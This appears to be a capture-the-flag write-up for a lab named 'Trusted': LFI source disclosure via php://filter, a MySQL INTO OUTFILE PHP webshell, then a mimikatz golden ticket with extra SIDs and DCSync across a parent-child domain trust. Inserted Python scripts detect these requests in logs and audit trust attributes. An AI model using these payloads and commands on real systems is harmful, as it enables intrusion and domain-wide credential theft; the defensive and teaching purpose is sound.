🤝Trusted

In this box you get a foothold through a web vulnerability, escalate privileges and then move laterally between two domains by abusing the trust between them.

IPs in scope:

10.10.232.181
10.10.232.182

Enumeration

These two machines are the domain controllers of two different domains, which probably have a trust relationship:

trusteddc.trusted.vl (10.10.232.181)
labdc.lab.trusted.vl (10.10.232.182)

The labdc machine (10.10.232.182) runs XAMPP with MySQL.

With Gobuster we find a /dev directory containing a PHP page whose view parameter is vulnerable to LFI, but reading local files with it reveals nothing of interest.

Enumerating the /dev directory further we find a db.php file.

Because the server would execute a PHP file instead of showing its source, we use the php://filter wrapper to make the LFI return the file base64-encoded:

http://10.10.232.182/dev/index.html?view=php://filter/convert.base64-encode/resource=C:\\xampp\\htdocs\\dev\\db.php

Decoding the output gives the MySQL credentials root:SuperSecureMySQLPassw0rd1337. In the news database we find the users and their hashed passwords, from which we recover rsmith:IHateEric2.

We cannot log in with RDP as this user and we don't find anything interesting in the shares.

Since the MySQL root account can write files, we can drop a PHP webshell from the MySQL shell with INTO OUTFILE:

select '<?php $cmd=$_GET["cmd"];system($cmd);?>' INTO OUTFILE 'C:\\xampp\\htdocs\\dev\\shell.php';
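Both steps above leave clear traces in the XAMPP access log: the php://filter wrapper in the view parameter, the traversal attempts, and the first hits on the dropped shell.php with a cmd parameter. The following detector is an added example for defenders and is not part of the original writeup; the log lines it scans are constructed to mirror the requests described above, and the indicator names (php_wrapper, webshell_style_request, and so on) are my own labels.

```python
import re
from dataclasses import dataclass, field
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed Apache/XAMPP combined-log sample (not taken from the original page).
SAMPLE_LOG = r"""10.10.14.5 - - [10/Jun/2023:10:01:02 +0000] "GET /dev/index.html?view=about.html HTTP/1.1" 200 512
10.10.14.5 - - [10/Jun/2023:10:01:40 +0000] "GET /dev/index.html?view=php://filter/convert.base64-encode/resource=C:\\xampp\\htdocs\\dev\\db.php HTTP/1.1" 200 1844
10.10.14.5 - - [10/Jun/2023:10:02:11 +0000] "GET /dev/index.html?view=..%2F..%2Fwindows%2Fwin.ini HTTP/1.1" 200 301
10.10.14.5 - - [10/Jun/2023:10:09:55 +0000] "GET /dev/shell.php?cmd=whoami HTTP/1.1" 200 44
10.10.14.9 - - [10/Jun/2023:10:10:03 +0000] "POST /dev/login.php HTTP/1.1" 302 0
"""

# Fields of the common log format we need: client IP, timestamp, method, request target.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# PHP stream wrappers that turn an include() into source disclosure or code execution.
WRAPPER_RE = re.compile(r'\b(?:php|expect|zip|phar|glob|file)://|\bdata:', re.I)
TRAVERSAL_RE = re.compile(r'\.\.[\\/]')
# Absolute path supplied as a value, e.g. resource=C:\xampp\... or view=/etc/passwd
ABS_PATH_RE = re.compile(r'(?:^|=)(?:[a-zA-Z]:\\|/etc/|/proc/)')
# Parameter names commonly used by one-line command shells (hypothetical list).
SHELL_PARAMS = {"cmd", "c", "exec", "command"}


@dataclass
class Finding:
    ip: str
    ts: str
    target: str
    reasons: list = field(default_factory=list)


def decode_query(target: str) -> dict:
    """Return {param: [values]} with percent-encoding removed twice to catch double encoding."""
    params = parse_qs(urlsplit(target).query, keep_blank_values=True)
    return {name: [unquote(v) for v in values] for name, values in params.items()}


def classify(target: str) -> list:
    """Return the sorted list of indicator names that match one request target."""
    reasons = set()
    params = decode_query(target)
    for values in params.values():
        for v in values:
            if WRAPPER_RE.search(v):
                reasons.add("php_wrapper")
            if "convert.base64-encode" in v.lower():
                reasons.add("base64_filter_source_disclosure")
            if TRAVERSAL_RE.search(v):
                reasons.add("path_traversal")
            if ABS_PATH_RE.search(v):
                reasons.add("absolute_path")
    # A .php resource being called with a command-style parameter is how a dropped
    # webshell such as /dev/shell.php?cmd=... looks from the server side.
    if urlsplit(target).path.lower().endswith(".php") and SHELL_PARAMS & set(params):
        reasons.add("webshell_style_request")
    return sorted(reasons)


def scan_log(text: str) -> list:
    """Scan access-log text and return a Finding for every request that matches an indicator."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        reasons = classify(m["target"])
        if reasons:
            findings.append(Finding(m["ip"], m["ts"], m["target"], reasons))
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f.ts} {f.ip} {f.target} -> {', '.join(f.reasons)}")
```

On the hardening side, the INTO OUTFILE write only works because the web application's MySQL account is root with the FILE privilege and secure_file_priv is not restricting where files may be written; a dedicated low-privilege database user and a secure_file_priv value pointing outside the web root (or disabling file operations) would have stopped that step even after the credentials leaked.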

I then use a PowerShell reverse shell to get a shell back on my machine and upgrade it to a beacon.

I create persistence by adding an account to the local Administrators group.

Exploiting domain trust

To enumerate the domain trusts we can use PowerView.

To abuse the bidirectional parent-child trust we forge a Golden Ticket for the child domain (lab.trusted.vl) that carries the Enterprise Admins SID of the parent domain (trusted.vl) as an extra SID, and then DCSync the root domain controller. The values we need are:

Child domain SID (lab.trusted.vl): S-1-5-21-2241985869-2159962460-1278545866

Parent domain SID (trusted.vl): S-1-5-21-3576695518-347000760-3731839591

Enterprise Admins SID (trusted.vl): S-1-5-21-3576695518-347000760-3731839591-519

krbtgt NTLM hash (lab.trusted.vl): c7a03c565c68c6fac5f8913fab576ebd

Now we craft the Golden Ticket and inject it into the current session:

mimikatz # kerberos::golden /user:Administrator /krbtgt:c7a03c565c68c6fac5f8913fab576ebd /domain:lab.trusted.vl /sid:S-1-5-21-2241985869-2159962460-1278545866 /sids:S-1-5-21-3576695518-347000760-3731839591-519 /ptt
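The reason this works is that the trust between lab.trusted.vl and trusted.vl is an intra-forest (parent-child) trust, and SID history coming over such a trust is accepted by the parent: the forest, not the domain, is the security boundary. A defender reviewing trusts wants to see exactly that property at a glance. The script below is an added example, not part of the original writeup: it decodes the trustAttributes bitmask that Active Directory stores on each trust (the bit values are those documented in MS-ADTS) and flags trusts over which SID history would be honoured. The trust records are constructed to resemble what Get-ADTrust would return from the lab.trusted.vl side; the names partner.example, vendor.example and other-forest.example are made up for the example.

```python
from dataclasses import dataclass

# Bit values of the Active Directory trustAttributes attribute (MS-ADTS section 6.1.6.7.9).
TRUST_ATTRIBUTE_BITS = {
    0x00000001: "NON_TRANSITIVE",
    0x00000002: "UPLEVEL_ONLY",
    0x00000004: "QUARANTINED_DOMAIN",   # SID filter quarantining: only SIDs of the trusted domain pass
    0x00000008: "FOREST_TRANSITIVE",
    0x00000010: "CROSS_ORGANIZATION",
    0x00000020: "WITHIN_FOREST",        # parent-child or tree-root trust inside one forest
    0x00000040: "TREAT_AS_EXTERNAL",
    0x00000080: "USES_RC4_ENCRYPTION",
    0x00000200: "CROSS_ORGANIZATION_NO_TGT_DELEGATION",
    0x00000400: "PIM_TRUST",
    0x00000800: "CROSS_ORGANIZATION_ENABLE_TGT_DELEGATION",
}

# Constructed sample of trust objects as seen from lab.trusted.vl (hypothetical, not from the page).
SAMPLE_TRUSTS = [
    {"name": "trusted.vl", "direction": "BiDirectional", "attributes": 0x20},
    {"name": "partner.example", "direction": "Outbound", "attributes": 0x80},
    {"name": "vendor.example", "direction": "BiDirectional", "attributes": 0x04},
    {"name": "other-forest.example", "direction": "BiDirectional", "attributes": 0x08},
]


@dataclass
class TrustFinding:
    trust: str
    issue: str
    detail: str


def decode_trust_attributes(value: int) -> list:
    """Translate a trustAttributes integer into flag names, lowest bit first."""
    names = []
    for bit in range(32):
        flag = 1 << bit
        if value & flag:
            names.append(TRUST_ATTRIBUTE_BITS.get(flag, f"UNKNOWN_0x{flag:X}"))
    return names


def assess_trust(trust: dict) -> list:
    """Return findings for one trust record regarding SID history and key strength."""
    flags = set(decode_trust_attributes(trust["attributes"]))
    name = trust["name"]
    findings = []
    if "WITHIN_FOREST" in flags:
        # Inside a forest SID filtering is not applied, so a Golden Ticket forged in the
        # child domain with the parent's Enterprise Admins SID in SID history is honoured.
        findings.append(TrustFinding(
            name, "intra_forest_sid_history",
            f"{trust['direction']} intra-forest trust: compromise of either domain's krbtgt "
            f"is compromise of the whole forest; protect both DCs and krbtgt accounts as one tier."))
    elif "FOREST_TRANSITIVE" not in flags and "QUARANTINED_DOMAIN" not in flags:
        # External (non-forest) trust whose SID filter quarantining has been switched off.
        findings.append(TrustFinding(
            name, "sid_filtering_quarantine_off",
            "external trust accepts SID history from the trusted domain; re-enable quarantining."))
    if "USES_RC4_ENCRYPTION" in flags:
        findings.append(TrustFinding(
            name, "rc4_trust_key",
            "trust key is RC4 only; enable AES on the trust so referral tickets are not RC4-keyed."))
    return findings


def assess_trusts(trusts: list) -> list:
    """Run assess_trust over every trust record and flatten the results."""
    return [f for t in trusts for f in assess_trust(t)]


if __name__ == "__main__":
    for t in SAMPLE_TRUSTS:
        print(f"{t['name']:24} {t['direction']:14} {decode_trust_attributes(t['attributes'])}")
    for f in assess_trusts(SAMPLE_TRUSTS):
        print(f"[{f.issue}] {f.trust}: {f.detail}")
```

The assessment deliberately does not suggest quarantining the parent-child trust: Microsoft does not support SID filter quarantining on trusts within a forest, so the practical mitigations are to treat every domain in the forest as part of the same security boundary, keep child domain controllers at the same protection level as the root, and rotate the child domain's krbtgt password twice after a compromise so the forged ticket stops validating.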

With the ticket in memory we DCSync the root domain controller and obtain the NTLM hash of the trusted.vl Administrator:

mimikatz # lsadump::dcsync /domain:trusted.vl /dc:trusteddc.trusted.vl /all

Note: all of this has to be done from a graphical session (RDP or VNC); it does not work over WinRM.
